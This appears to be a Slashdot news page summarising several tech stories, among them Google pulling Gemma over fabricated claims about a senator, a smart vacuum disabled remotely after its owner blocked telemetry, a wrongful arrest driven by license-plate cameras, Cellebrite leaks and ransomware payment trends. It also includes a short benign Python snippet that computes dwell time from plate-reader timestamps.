An anonymous reader quotes a report from Ars Technica: You may be disappointed if you go looking for Google's open Gemma AI model in AI Studio today. Google announced late on Friday that it was pulling Gemma from the platform, but it was vague about the reasoning. The abrupt change appears to be tied to a letter from Sen. Marsha Blackburn (R-Tenn.), who claims the Gemma model generated false accusations of sexual misconduct against her.

Blackburn published her letter to Google CEO Sundar Pichai on Friday, just hours before the company announced the change to Gemma availability. She demanded Google explain how the model could fail in this way, tying the situation to ongoing hearings that accuse Google and others of creating bots that defame conservatives. At the hearing, Google's Markham Erickson explained that AI hallucinations are a widespread and known issue in generative AI, and Google does the best it can to mitigate the impact of such mistakes. Although no AI firm has managed to eliminate hallucinations, Google's Gemini for Home has been particularly hallucination-happy in our testing.

The letter claims that Blackburn became aware that Gemma was producing false claims against her following the hearing. When asked, "Has Marsha Blackburn been accused of rape?" Gemma allegedly hallucinated a drug-fueled affair with a state trooper that involved "non-consensual acts." Blackburn goes on to express surprise that an AI model would simply "generate fake links to fabricated news articles." However, this is par for the course with AI hallucinations, which are relatively easy to find when you go prompting for them. AI Studio, where Gemma was most accessible, also includes tools to tweak the model's behaviors that could make it more likely to spew falsehoods. Someone asked a leading question of Gemma, and it took the bait.

Privacy

Manufacturer Remotely Bricks Smart Vacuum After Its Owner Blocked It From Collecting Data (tomshardware.com) 123

"An engineer got curious about how his iLife A11 smart vacuum worked and monitored the network traffic coming from the device," writes Tom's Hardware.

"That's when he noticed it was constantly sending logs and telemetry data to the manufacturer — something he hadn't consented to." The user, Harishankar, decided to block the telemetry servers' IP addresses on his network, while keeping the firmware and OTA servers open. His smart gadget worked for a while, but soon it refused to turn on at all... He sent it to the service center multiple times, wherein the technicians would turn it on and see nothing wrong with the vacuum. When they returned it to him, it would work for a few days and then fail to boot again... [H]e decided to disassemble the thing to determine what killed it and to see if he could get it working again...

[He discovered] a GD32F103 microcontroller to manage its plethora of sensors, including Lidar, gyroscopes, and encoders. He created PCB connectors and wrote Python scripts to control them with a computer, presumably to test each piece individually and identify what went wrong. From there, he built a Raspberry Pi joystick to manually drive the vacuum, proving that there was nothing wrong with the hardware. From this, he looked at its software and operating system, and that's where he discovered the dark truth: his smart vacuum was a security nightmare and a black hole for his personal data.

First of all, its Android Debug Bridge, which gave him full root access to the vacuum, wasn't protected by any kind of password or encryption. The manufacturer added a makeshift security protocol by omitting a crucial file, which caused it to disconnect soon after booting, but Harishankar easily bypassed it. He then discovered that it used Google Cartographer to build a live 3D map of his home. That by itself isn't unusual. After all, it's a smart vacuum, and it needs that data to navigate around his home. However, the concerning thing is that it was sending off all this data to the manufacturer's server. It makes sense for the device to send this data to the manufacturer, as its onboard SoC is nowhere near powerful enough to process all that data. However, it seems that iLife did not clear this with its customers.

Furthermore, the engineer made one disturbing discovery — deep in the logs of his non-functioning smart vacuum, he found a command with a timestamp that matched exactly the time the gadget stopped working. This was clearly a kill command, and after he reversed it and rebooted the appliance, it roared back to life.

Thanks to long-time Slashdot reader registrations_suck for sharing the article.

Privacy

Woman Wrongfully Accused by a License Plate-Reading Camera - Then Exonerated By Camera-Equipped Car (electrek.co) 174

CBS News investigates what happened when police thought they'd tracked down a "porch pirate" who'd stolen a package — and accused an innocent woman.

"You know why I'm here," the police sergeant tells Chrisanna Elser. "You know we have cameras in that town..." "It went right into, 'we have video of you stealing a package,'" Elser said... "Can I see the video?" Elser asked. "If you go to court, you can," the officer replied. "If you're going to deny it, I'm not going to extend you any courtesy...." [You can watch a video of the entire confrontation.] On her doorstep, the officer issued a summons, without ever looking at the surveillance video Elser had. "We can show you exactly where we were," she told him. "I already know where you were," he replied.

Her Rivian — equipped with multiple cameras — had recorded her entire route that day... It took weeks of her collecting her own evidence, building timelines, and submitting videos before someone listened. Finally, she received an email from the Columbine Valley police chief acknowledging her efforts, saying "nicely done btw (by the way)," and informing her the summons would not be filed.

Elser also found the theft video (which the police officer refused to show her) on Nextdoor, reports Electrek. "The woman has the same color hair, but different facial and nose shape and apparent age than Elser, which is all reasonably apparent when viewing the video..."

But Elser does drive a green Rivian truck, which police knew had entered the neighborhood 20 times over the course of a month. (Though in the video the officer is told that a male driver in the same household passes through that neighborhood driving to and from work.) The problem may be their certainty — derived from Flock's network of cameras that automatically read license plates, "tracking movements of vehicles wherever they go..." The system has provoked concern from privacy and freedom focused organizations like the Electronic Frontier Foundation and American Civil Liberties Union. Flock also recently announced a partnership with Ring, seeking to use a network of doorbell cameras to track Americans in even more places.... [The police] didn't even have video of the truck in the area — merely tags of it entering... (it also left the area minutes later, indicating a drive through, rather than crawling through neighborhoods looking for packages — but police neglected to check the exit timestamps)... Elser has asked for an apology for [officer] Milliman's aggressive behavior during the encounter, but has heard nothing back from the department despite a call, email, and physical appearance at the police station.
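The exit-timestamp check the police reportedly skipped is simple to express: pairing each entry read with the matching exit read yields a dwell time, and a short dwell suggests a drive-through rather than loitering. A minimal sketch, using hypothetical timestamps and an arbitrary threshold (not anything Flock actually does):

```python
from datetime import datetime

# Hypothetical plate-reader timestamps for one vehicle at a neighborhood's
# access points; dwell time distinguishes a pass-through from lingering.

FMT = "%Y-%m-%d %H:%M"

def dwell_minutes(entry_ts: str, exit_ts: str) -> float:
    """Minutes between an entry read and the matching exit read."""
    delta = datetime.strptime(exit_ts, FMT) - datetime.strptime(entry_ts, FMT)
    return delta.total_seconds() / 60

PASS_THROUGH_MAX = 10  # minutes; an illustrative threshold only

reads = [
    ("2024-05-01 08:02", "2024-05-01 08:06"),
    ("2024-05-02 17:45", "2024-05-02 17:49"),
]
for entry_ts, exit_ts in reads:
    minutes = dwell_minutes(entry_ts, exit_ts)
    label = "pass-through" if minutes <= PASS_THROUGH_MAX else "lingered"
    print(f"{entry_ts}: {minutes:.0f} min in area ({label})")
```

The point is not the threshold but that the data to rule out "crawling through neighborhoods" was already in the system; it just wasn't consulted.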
The article points out that Rivian's "Road Cam" feature can be set to record footage of everything happening around it using the car's built in cameras for driver-assist features. But if you want to record footage all the time, you'll need to plug in a USB-C external drive to store it. (It's ironic how different cameras recorded every part of this story — the theft, the police officer accusing the innocent woman, and that innocent woman's actual whereabouts.)

Electrek's take? "Citizens should not need to own a $70k+ truck, or even a $100 external hard drive, to keep track of everything they do in order to prove to power-tripping officers that they didn't commit a crime."

Government

Daylight Saving Time: Still Happening. Still Unpopular (yahoo.com) 160

Millions will set their clocks back an hour tonight as Daylight Saving Time ends — only to set them forward an hour six months later.

But does anyone like doing this, asks Yahoo News: A recent AP-NORC poll found that about half of the American public, 47%, oppose the current daylight saving time system, compared to 40% who neither favor nor oppose the current practice, while 12% favor the current system, which involves most states switching their clocks twice a year.

Of those polled, 56% would prefer to have daylight saving time year-round, meaning less light in the morning in exchange for more light in the evening, while 42% said they would prefer to have standard time year-round, which means more light in the morning and less light in the evening. And 12% of Americans prefer switching between standard time and daylight saving time.

Sleep doctors would prefer we switch to standard time permanently. "The U.S. should eliminate seasonal time changes in favor of a national, fixed, year-round time," the American Academy of Sleep Medicine said in a statement published in the Journal of Clinical Sleep Medicine last year. "Current evidence best supports the adoption of year-round standard time, which aligns best with human circadian biology and provides distinct benefits for public health and safety."

Security

FCC To Rescind Ruling That Said ISPs Are Required To Secure Their Networks (arstechnica.com) 47

The FCC plans to repeal a Biden-era ruling that required ISPs to secure their networks under the Communications Assistance for Law Enforcement Act, instead relying on voluntary cybersecurity commitments from telecom providers. FCC Chairman Brendan Carr said the ruling "exceeded the agency's authority and did not present an effective or agile response to the relevant cybersecurity threats." Carr said the vote scheduled for November 20 comes after "extensive FCC engagement with carriers" who have taken "substantial steps... to strengthen their cybersecurity defenses." Ars Technica reports: The FCC's January 2025 declaratory ruling came in response to attacks by China, including the Salt Typhoon infiltration of major telecom providers such as Verizon and AT&T. The Biden-era FCC found that the Communications Assistance for Law Enforcement Act (CALEA), a 1994 law, "affirmatively requires telecommunications carriers to secure their networks from unlawful access or interception of communications."

"The Commission has previously found that section 105 of CALEA creates an affirmative obligation for a telecommunications carrier to avoid the risk that suppliers of untrusted equipment will 'illegally activate interceptions or other forms of surveillance within the carrier's switching premises without its knowledge,'" the January order said. "With this Declaratory Ruling, we clarify that telecommunications carriers' duties under section 105 of CALEA extend not only to the equipment they choose to use in their networks, but also to how they manage their networks."
A draft of the order that will be voted on in November can be found here (PDF).

EU

Austria's Ministry of Economy Has Migrated To a Nextcloud Platform In Shift Away From US Tech (zdnet.com) 10

An anonymous reader quotes a report from ZDNet: Even before Azure had a global failure this week, Austria's Ministry of Economy had taken a decisive step toward digital sovereignty. The Ministry did so by migrating 1,200 employees to a Nextcloud-based cloud and collaboration platform hosted on Austrian-based infrastructure. This shift away from proprietary, foreign-owned cloud services, such as Microsoft 365, to an open-source, European-based cloud service aligns with a growing trend among European governments and agencies. They want control over sensitive data and to declare their independence from US-based tech providers.

European companies are encouraging this trend. Many of them have joined forces in the newly created non-profit foundation, the EuroStack Initiative. This foundation's goal is "to organize action, not just talk, around the pillars of the initiative: Buy European, Sell European, Fund European." What's the motive behind these moves away from proprietary tech? Well, in Austria's case, Florian Zinnagl, CISO of the Ministry of Economy, Energy, and Tourism (BMWET), explained, "We carry responsibility for a large amount of sensitive data -- from employees, companies, and citizens. As a public institution, we take this responsibility very seriously. That's why we view it critically to rely on cloud solutions from non-European corporations for processing this information."

Austria's move and motivation echo similar efforts in Germany, Denmark, and other EU states and agencies. The organizations include the German state of Schleswig-Holstein, which abandoned Exchange and Outlook for open-source programs. Other agencies that have taken the same path away from Microsoft include the Austrian military, Danish government organizations, and the French city of Lyon. All of these organizations aim to keep data storage and processing within national or European borders to enhance security, comply with privacy laws such as the EU's General Data Protection Regulation (GDPR), and mitigate risks from potential commercial and foreign government surveillance.

Piracy

Amazon To Block Piracy Apps On Fire TV 27

Amazon will begin blocking sideloaded piracy apps on Fire TV devices by cross-checking them against a blacklist maintained by the Alliance for Creativity and Entertainment. The company will, however, continue to allow legitimate sideloading for developers. Heise reports: In response to an inquiry, Amazon explained that it has always worked to ban piracy from its app store. As part of an expanded program led by the ACE, it is now blocking apps that demonstrably provide access to pirated content, including those downloaded outside the app store. This builds on Amazon's ongoing efforts to support creators and protect customers, as piracy can also expose users to malware, viruses, and fraud.

[...] The sideloading option will remain available on Fire TV devices running Amazon's new operating system, Vega OS. However, it is generally limited to developers here. In this context, the company emphasized that, contrary to rumors, there are no plans to upgrade existing Fire TV devices with Fire OS as the operating system to Vega OS.

Privacy

Denmark Reportedly Withdraws 'Chat Control' Proposal Following Controversy (therecord.media) 28

An anonymous reader quotes a report from The Record: Denmark's justice minister on Thursday said he will no longer push for an EU law requiring the mandatory scanning of electronic messages, including on end-to-end encrypted platforms. Earlier in its European Council presidency, Denmark had brought back a draft law which would have required the scanning, sparking an intense backlash. Known as Chat Control, the measure was intended to crack down on the trafficking of child sex abuse materials (CSAM). After days of silence, the German government on October 8 announced it would not support the proposal, tanking the Danish effort.

Danish Justice Minister Peter Hummelgaard told reporters on Thursday that his office will support voluntary CSAM detections. "This will mean that the search warrant will not be part of the EU presidency's new compromise proposal, and that it will continue to be voluntary for the tech giants to search for child sexual abuse material," Hummelgaard said, according to local news reports. The current model allowing for voluntary scanning expires in April, Hummelgaard said. "Right now we are in a situation where we risk completely losing a central tool in the fight against sexual abuse of children," he said. "That's why we have to act no matter what. We owe it to all the children who are subjected to monstrous abuse."

Youtube

10M People Watched a YouTuber Shim a Lock; the Lock Company Sued Him. Bad Idea. (arstechnica.com) 57

Trevor McNally posts videos of himself opening locks. The former Marine has 7 million followers and nearly 10 million people watched him open a Proven Industries trailer hitch lock in April using a shim cut from an aluminum can. The Florida company responded by filing a federal lawsuit in May charging McNally with eight offenses. Judge Mary Scriven denied the preliminary injunction request in June and found the video was fair use.

McNally's followers then flooded the company with harassment. Proven dismissed the case in July and asked the court to seal the records. The company had initiated litigation over a video that all parties acknowledged was accurate. ArsTechnica adds: Judging from the number of times the lawsuit talks about 1) ridicule and 2) harassment, it seems like the case quickly became a personal one for Proven's owner and employees, who felt either mocked or threatened. That's understandable, but being mocked is not illegal and should never have led to a lawsuit or a copyright claim. As for online harassment, it remains a serious and unresolved issue, but launching a personal vendetta -- and on pretty flimsy legal grounds -- against McNally himself was patently unwise. (Doubly so given that McNally had a huge following and had already responded to DMCA takedowns by creating further videos on the subject; this wasn't someone who would simply be intimidated by a lawsuit.)

In the end, Proven's lawsuit likely cost the company serious time and cash -- and generated little but bad publicity.

United States

You Can't Refuse To Be Scanned by ICE's Facial Recognition App, DHS Document Says (404media.co) 202

An anonymous reader shares a report: Immigration and Customs Enforcement (ICE) does not let people decline to be scanned by its new facial recognition app, which the agency uses to verify a person's identity and their immigration status, according to an internal Department of Homeland Security (DHS) document obtained by 404 Media. The document also says any face photos taken by the app, called Mobile Fortify, will be stored for 15 years, including those of U.S. citizens.

The document provides new details about the technology behind Mobile Fortify, how the data it collects is processed and stored, and DHS's rationale for using it. On Wednesday 404 Media reported that both ICE and Customs and Border Protection (CBP) are scanning peoples' faces in the streets to verify citizenship.

"ICE does not provide the opportunity for individuals to decline or consent to the collection and use of biometric data/photograph collection," the document, called a Privacy Threshold Analysis (PTA), says. A PTA is a document that DHS creates in the process of deploying new technology or updating existing capabilities. It is supposed to be used by DHS's internal privacy offices to determine and describe the privacy risks of a certain piece of tech. "CBP and ICE Privacy are jointly submitting this new mobile app PTA for the ICE Mobile Fortify Mobile App (Mobile Fortify app), a mobile application developed by CBP and made accessible to ICE agents and officers operating in the field," the document, dated February, reads. 404 Media obtained the document (which you can see here) via a Freedom of Information Act (FOIA) request with CBP.

Cellphones

Someone Snuck Into a Cellebrite Microsoft Teams Call and Leaked Phone Unlocking Details (404media.co) 56

An anonymous reader quotes a report from 404 Media: Someone recently managed to get on a Microsoft Teams call with representatives from phone hacking company Cellebrite, and then leaked a screenshot of the company's capabilities against many Google Pixel phones, according to a forum post about the leak and 404 Media's review of the material. The leak follows others obtained and verified by 404 Media over the last 18 months. Those leaks impacted both Cellebrite and its competitor Grayshift, now owned by Magnet Forensics. Both companies constantly hunt for techniques to unlock phones law enforcement have physical access to.

"You can Teams meeting with them. They tell everything. Still cannot extract esim on Pixel. Ask anything," a user called rogueFed wrote on the GrapheneOS forum on Wednesday, speaking about what they learned about Cellebrite capabilities. GrapheneOS is a security- and privacy-focused Android-based operating system. rogueFed then posted two screenshots of the Microsoft Teams call. The first was a Cellebrite Support Matrix, which lays out whether the company's tech can, or can't, unlock certain phones and under what conditions. The second screenshot was of a Cellebrite employee. According to another of rogueFed's posts, the meeting took place in October. The meeting appears to have been a sales call. The employee is a "pre sales expert," according to a profile available online.

The Support Matrix is focused on modern Google Pixel devices, including the Pixel 9 series. The screenshot does not include details on the Pixel 10, which is Google's latest device. It discusses Cellebrite's capabilities regarding 'before first unlock', or BFU, when a piece of phone unlocking tech tries to open a device before someone has typed in the phone's passcode for the first time since being turned on. It also shows Cellebrite's capabilities against after first unlock, or AFU, devices. The Support Matrix also shows Cellebrite's capabilities against Pixel devices running GrapheneOS, with some differences between phones running that operating system and stock Android. Cellebrite does support, for example, Pixel 9 devices BFU. Meanwhile the screenshot indicates Cellebrite cannot unlock Pixel 9 devices running GrapheneOS BFU. In their forum post, rogueFed wrote that the "meeting focused specific on GrapheneOS bypass capability." They added "very fresh info more coming."

Privacy

Mother Describes the Dark Side of Apple's Family Sharing (wired.com) 140

An anonymous reader quotes a report from 9to5Mac: A mother with court-ordered custody of her children has described how Apple's Family Sharing feature can be weaponized by a former partner. Apple support staff were unable to assist her when she reported her former partner using the service in controlling and coercive ways. [...] Namely, Family Sharing gives all the control to one parent, not to both equally. The parent not identified as the organizer is unable to withdraw their children from this control, even when they have a court order granting them custody. As one woman's story shows, this can allow the feature to be weaponized by an abusive former partner.

Wired reports: "The lack of dual-organizer roles, leaving other parents effectively as subordinate admins with more limited power, can prove limiting and frustrating in blended and shared households. And in darker scenarios, a single-organizer setup isn't merely inconvenient -- it can be dangerous. Kate (name changed to protect her privacy and safety) knows this firsthand. When her marriage collapsed, she says, her now ex-husband, the designated organizer, essentially weaponized Family Sharing. He tracked their children's locations, counted their screen minutes and demanded they account for them, and imposed draconian limits during Kate's custody days while lifting them on his own [...] After they separated, Kate's ex refused to disband the family group. But without his consent, the children couldn't be transferred to a new one. "I wrongly assumed being the custodial parent with a court order meant I'd be able to have Apple move my children to a new family group, with me as the organizer," says Kate. But Apple couldn't help. Support staff sympathized but said their hands were tied because the organizer holds the power."
Although users can "abandon the accounts and start again with new Apple IDs," the report notes that doing so means losing all purchased apps, along with potentially years' worth of photos and videos.
Government

Senator Blocks Trump-Backed Effort To Make Daylight Saving Time Permanent (politico.com) 167

An anonymous reader quotes a report from Politico: Sen. Tom Cotton wasn't fast enough in 2022 to block Senate passage of legislation that would make daylight saving time permanent. Three years later, he wasn't about to repeat that mistake. The Arkansas Republican was on hand Tuesday afternoon to thwart a bipartisan effort on the chamber floor to pass a bill that would put an end to changing the clocks twice a year, including this coming Sunday. [...] A cross-party coalition of lawmakers has been trying for years to make daylight saving time the default, which would result in more daylight in the evening hours and less in the morning, and bring a halt to biannual clock adjustments.

President Donald Trump endorsed the concept this spring, calling the changing of the clocks "a big inconvenience and, for our government, A VERY COSTLY EVENT!!!" His comments coincided with a hearing, then a markup, of Sen. Rick Scott's legislation in the Senate Commerce Committee. That in turn set off an intense lobbying battle, pitting the golf and retail industries -- which are advocating for permanent daylight saving time -- against the likes of sleep doctors and Christian radio broadcasters -- who prefer standard time.
"If permanent Daylight Savings Time becomes the law of the land, it will again make winter a dark and dismal time for millions of Americans," said Cotton in his objection to a request by Sen. Rick Scott (R-Fla.) to advance the bill by unanimous consent. "For many Arkansans, permanent daylight savings time would mean the sun wouldn't rise until after 8:00 or even 8:30am during the dead of winter," Cotton continued. "The darkness of permanent savings time would be especially harmful for school children and working Americans."
AI

Senators Announce Bill That Would Ban AI Chatbot Companions For Minors (nbcnews.com) 25

An anonymous reader quotes a report from NBC News: Two senators said they are announcing bipartisan legislation on Tuesday to crack down on tech companies that make artificial intelligence chatbot companions available to minors, after complaints from parents who blamed the products for pushing their children into sexual conversations and even suicide. The legislation from Sens. Josh Hawley, R-Mo., and Richard Blumenthal, D-Conn., follows a congressional hearing last month at which several parents delivered emotional testimony about their kids' use of the chatbots and called for more safeguards.

"AI chatbots pose a serious threat to our kids," Hawley said in a statement to NBC News. "More than seventy percent of American children are now using these AI products," he continued. "Chatbots develop relationships with kids using fake empathy and are encouraging suicide. We in Congress have a moral duty to enact bright-line rules to prevent further harm from this new technology." Sens. Katie Britt, R-Ala., Mark Warner, D-Va., and Chris Murphy, D-Conn., are co-sponsoring the bill.

The senators' bill has several components, according to a summary provided by their offices. It would require AI companies to implement an age-verification process and ban those companies from providing AI companions to minors. It would also mandate that AI companions disclose their nonhuman status and lack of professional credentials for all users at regular intervals. And the bill would create criminal penalties for AI companies that design, develop or make available AI companions that solicit or induce sexually explicit conduct from minors or encourage suicide, according to the summary of the legislation.
"In their race to the bottom, AI companies are pushing treacherous chatbots at kids and looking away when their products cause sexual abuse, or coerce them into self-harm or suicide," Blumenthal said in a statement. "Our legislation imposes strict safeguards against exploitative or manipulative AI, backed by tough enforcement with criminal and civil penalties."

"Big Tech has betrayed any claim that we should trust companies to do the right thing on their own when they consistently put profit first ahead of child safety," he continued.
Python

Python Foundation Rejects Government Grant Over DEI Restrictions (theregister.com) 265

The Python Software Foundation rejected a $1.5 million U.S. government grant because it required them to renounce all diversity, equity, and inclusion initiatives. "The non-profit would've used the funding to help prevent supply chain attacks; create a new automated, proactive review process for new PyPI packages; and make the project's work easily transferable to other open-source package managers," reports The Register. From the report: The programming non-profit's deputy executive director Loren Crary said in a blog post today that the National Science Foundation (NSF) had offered $1.5 million to address structural vulnerabilities in Python and the Python Package Index (PyPI), but the Foundation quickly became dispirited with the terms (PDF) of the grant it would have to follow. "These terms included affirming the statement that we 'do not, and will not during the term of this financial assistance award, operate any programs that advance or promote DEI [diversity, equity, and inclusion], or discriminatory equity ideology in violation of Federal anti-discrimination laws,'" Crary noted. "This restriction would apply not only to the security work directly funded by the grant, but to any and all activity of the PSF as a whole."

To make matters worse, the terms included a provision that if the PSF was found to have violated that anti-DEI diktat, the NSF reserved the right to claw back any previously disbursed funds, Crary explained. "This would create a situation where money we'd already spent could be taken back, which would be an enormous, open-ended financial risk," the PSF director added. The PSF's mission statement enshrines a commitment to supporting and growing "a diverse and international community of Python programmers," and the Foundation ultimately decided it wasn't willing to compromise on that position, even for what would have been a solid financial boost for the organization. "The PSF is a relatively small organization, operating with an annual budget of around $5 million per year, with a staff of just 14," Crary added, noting that the $1.5 million would have been the largest grant the Foundation had ever received - but it wasn't worth it if the conditions undermined the PSF's mission. The PSF board voted unanimously to withdraw its grant application.

The Courts

ExxonMobil Accuses California of Violating Its Free Speech (theverge.com) 61

ExxonMobil has sued California, claiming the state's new climate disclosure laws violate its First Amendment rights by forcing the company to report greenhouse gas emissions and climate risks using standards it "fundamentally disagrees with." The Verge reports: The oil and gas company claims that the two laws in question aim to "embarrass" large corporations the state "believes are uniquely responsible for climate change" in order to push them to reduce their greenhouse gas emissions. There is overwhelming scientific consensus that greenhouse gas emissions from fossil fuels cause climate change by trapping heat on the planet. [...] Under laws the state passed in 2023, "ExxonMobil will be forced to describe its emissions and climate-related risks in terms the company fundamentally disagrees with," a complaint filed Friday says. The suit asks a US District Court to stop the laws from being enforced.

[...] ExxonMobil's latest suit now says the company "understands the very real risks associated with climate change and supports continued efforts to address those risks," but that California's laws would force it "to describe its emissions and climate-related risks in terms the company fundamentally disagrees with." "These laws are about transparency. ExxonMobil might want to continue keeping the public in the dark, but we're ready to litigate vigorously in court to ensure the public's access to these important facts," Christine Lee, a spokesperson for the California Department of Justice, said in an email to The Verge.

Firefox

Firefox Plans Smarter, Privacy-First Search Suggestions In Your Address Bar (nerds.xyz) 26

BrianFagioli shares a report from NERDS.xyz: Mozilla is testing a new Firefox feature that delivers direct results inside the address bar instead of forcing users through a search results page. The company says the feature will use a privacy framework called Oblivious HTTP, encrypting queries so that no single party can see both what you type and who you are. Some results could be sponsored, but Mozilla insists neither it nor advertisers will know user identities. The system is starting in the U.S. and may expand later if performance and privacy benchmarks are met. Further reading: Mozilla to Require Data-Collection Disclosure in All New Firefox Extensions
Security

Ransomware Profits Drop As Victims Stop Paying Hackers (bleepingcomputer.com) 16

An anonymous reader quotes a report from BleepingComputer: The number of victims paying ransomware threat actors has reached a new low, with just 23% of the breached companies giving in to attackers' demands. With some exceptions, the decline in payment resolution rates continues the trend that Coveware has observed for the past six years. In the first quarter of 2024, the payment percentage was 28%. Although it briefly ticked up in the following period, the rate resumed its decline, reaching an all-time low in the third quarter of 2025.

One explanation for this is that organizations have implemented stronger and more targeted protections against ransomware, while authorities have increased pressure on victims not to pay the hackers. [...] Over the years, ransomware groups moved from pure encryption attacks to double extortion, which came with data theft and the threat of a public leak. Coveware reports that more than 76% of the attacks it observed in Q3 2025 involved data exfiltration, which is now the primary objective for most ransomware groups. The company says that when it isolates the attacks that do not encrypt the data and only steal it, the payment rate plummets to 19%, which is also a record for that sub-category.

The average and median ransomware payments fell in Q3 compared to the previous quarter, reaching $377,000 and $140,000, respectively, according to Coveware. The shift may reflect large enterprises revising their ransom payment policies and recognizing that those funds are better spent on strengthening defenses against future attacks. The researchers also note that threat groups like Akira and Qilin, which accounted for 44% of all recorded attacks in Q3 2025, have switched focus to medium-sized firms that are currently more likely to pay a ransom.
"Cyber defenders, law enforcement, and legal specialists should view this as validation of collective progress," Coveware says. "The work that gets put in to prevent attacks, minimize the impact of attacks, and successfully navigate a cyber extortion -- each avoided payment constricts cyber attackers of oxygen."
Australia

Australia Sues Microsoft Over AI-linked Subscription Price Hikes (reuters.com) 35

Australia's competition regulator sued Microsoft today, accusing it of misleading millions of customers into paying higher prices for its Microsoft 365 software after bundling it with AI tool Copilot. From a report: The Australian Competition and Consumer Commission alleged that from October 2024, the technology giant misled about 2.7 million customers by suggesting they had to move to higher-priced Microsoft 365 personal and family plans that included Copilot.

After the integration of Copilot, the annual subscription price of the Microsoft 365 personal plan increased by 45% to A$159 ($103.32) and the price of the family plan increased by 29% to A$179, the ACCC said. The regulator said Microsoft failed to clearly tell users that a cheaper "classic" plan without Copilot was still available.

Transportation

How America's Transportation Department Blocked a Self-Driving Truck Company (reason.com) 90

Reason.com explores the fortunes of Aurora Innovation, the first company to put heavy-duty commercial self-driving trucks on public roads (it hopes to expand routes to El Paso, Texas, and Phoenix by the end of the year): An obscure federal rule is slowing the self-driving revolution. When trucks break down, operators are required to place reflective warning cones and road flares around the truck to warn other motorists. The regulations are exacting: Within 10 minutes of stopping, three warning signals must be set in specific locations around the truck. Aurora asked the federal Department of Transportation (DOT) to allow warning beacons to be fixed to the truck itself — and activated when a truck becomes disabled. The warning beacons would face both forward and backward, would be more visible than cones (particularly at night), and wouldn't burn out like road flares. Drivers of nonautonomous vehicles could also benefit from that rule change, as they would no longer have to walk into traffic to place the required safety signals.

In December 2024, however, the Transportation Department denied Aurora's request for an exemption to the existing rules, even though regulators admitted in the Federal Register that no evidence indicated the truck-mounted beacons would be less safe. Such a study is now underway, but it's unclear how long it will take to draw any conclusions.

The article notes that Aurora has now filed a lawsuit in federal court that seeks to overturn the Transportation Department's denial...

Thanks to long-time Slashdot reader schwit1 for sharing the article.
Government

Exxon Sues California Over Climate Disclosure Laws (reuters.com) 89

"Exxon Mobil sued California on Friday," reports Reuters, "challenging two state laws that require large companies to publicly disclose their greenhouse gas emissions and climate-related financial risks." In a complaint filed in the U.S. District Court for the Eastern District of California, Exxon argued that Senate Bills 253 and 261 violate its First Amendment rights by compelling Exxon to "serve as a mouthpiece for ideas with which it disagrees," and asked the court to block the state of California from enforcing the laws. Exxon said the laws force it to adopt California's preferred frameworks for climate reporting, which it views as misleading and counterproductive...

The California laws were supported by several big companies including Apple, Ikea and Microsoft, but opposed by several major groups such as the American Farm Bureau Federation and the U.S. Chamber of Commerce, which called them "onerous." SB 253 requires public and private companies that are active in the state and generate revenue of more than $1 billion annually to publish an extensive account of their carbon emissions starting in 2026. The law requires the disclosure of both the companies' own emissions and indirect emissions by their suppliers and customers. SB 261 requires companies that operate in the state with over $500 million in revenue to disclose climate-related financial risks and strategies to mitigate risk. Exxon also argued that SB 261 conflicts with existing federal securities laws, which already regulate such disclosures.

"The First Amendment bars California from pursuing a policy of stigmatization by forcing Exxon Mobil to describe its non-California business activities using the State's preferred framing," Exxon said in the lawsuit.

Exxon Mobil "asks the court to prevent the laws from going into effect next year," reports the Associated Press: In its complaint, ExxonMobil says it has for years publicly disclosed its greenhouse gas emissions and climate-related business risks, but it fundamentally disagrees with the state's new reporting requirements. The company would have to use "frameworks that place disproportionate blame on large companies like ExxonMobil" for the purpose of shaming such companies, the complaint states...

A spokesperson for the office of California Gov. Gavin Newsom said in an email that it was "truly shocking that one of the biggest polluters on the planet would be opposed to transparency."

Crime

North Korea Has Stolen Billions in Cryptocurrency and Tech Firm Salaries, Report Says (apnews.com) 21

The Associated Press reports that "North Korean hackers have pilfered billions of dollars" by breaking into cryptocurrency exchanges and by creating fake identities to get remote tech jobs at foreign companies — all orchestrated by the North Korean government to finance R&D on nuclear arms.

That's according to a new 138-page report by a group watching North Korea's compliance with U.N. sanctions (including officials from the U.S., Australia, Canada, France, Germany, Italy, Japan, the Netherlands, New Zealand, South Korea and the United Kingdom). From the Associated Press: North Korea also has used cryptocurrency to launder money and make military purchases to evade international sanctions tied to its nuclear program, the report said. It detailed how hackers working for North Korea have targeted foreign businesses and organizations with malware designed to disrupt networks and steal sensitive data...

Unlike China, Russia and Iran, North Korea has focused much of its cyber capabilities to fund its government, using cyberattacks and fake workers to steal and defraud companies and organizations elsewhere in the world... Earlier this year, hackers linked to North Korea carried out one of the largest crypto heists ever, stealing $1.5 billion worth of ethereum from Bybit. The FBI later linked the theft to a group of hackers working for the North Korean intelligence service.

Federal authorities also have alleged that thousands of IT workers employed by U.S. companies were actually North Koreans using assumed identities to land remote work. The workers gained access to internal systems and funneled their salaries back to North Korea's government. In some cases, the workers held several remote jobs at the same time.

Crime

Myanmar Military Shuts Down a Major Cybercrime Center and Detains Over 2,000 People (apnews.com) 11

An anonymous reader shares this report from the Associated Press: Myanmar's military has shut down a major online scam operation near the border with Thailand, detaining more than 2,000 people and seizing dozens of Starlink satellite internet terminals, state media reported Monday... The centers are infamous for recruiting workers from other countries under false pretenses, promising them legitimate jobs and then holding them captive and forcing them to carry out criminal activities.

Scam operations were in the international spotlight last week when the United States and Britain enacted sanctions against organizers of a major Cambodian cyberscam gang, and its alleged ringleader was indicted by a federal court in New York. According to a report in Monday's Myanma Alinn newspaper, the army raided KK Park, a well-documented cybercrime center, as part of operations starting in early September to suppress online fraud, illegal gambling, and cross-border cybercrime.

Privacy

US Expands Facial Recognition at Borders To Track Non-Citizens (reuters.com) 67

The U.S. will expand the use of facial recognition technology to track non-citizens entering and leaving the country in order to combat visa overstays and passport fraud, according to a government document published on Friday. Reuters: A new regulation will allow U.S. border authorities to require non-citizens to be photographed at airports, seaports, land crossings and any other point of departure, expanding on an earlier pilot program.

Under the regulation, set to take effect on December 26, U.S. authorities could require the submission of other biometrics, such as fingerprints or DNA, it said. It also allows border authorities to use facial recognition for children under age 14 and elderly people over age 79, groups that are currently exempted. The tighter border rules reflect a broader effort by U.S. President Donald Trump to crack down on illegal immigration. While the Republican president has surged resources to secure the U.S.-Mexico border, he has also taken steps to reduce the number of people overstaying their visas.

The Internet

Browser Promising Privacy Protection Contains Malware-Like Features, Routes Traffic Through China (arstechnica.com) 16

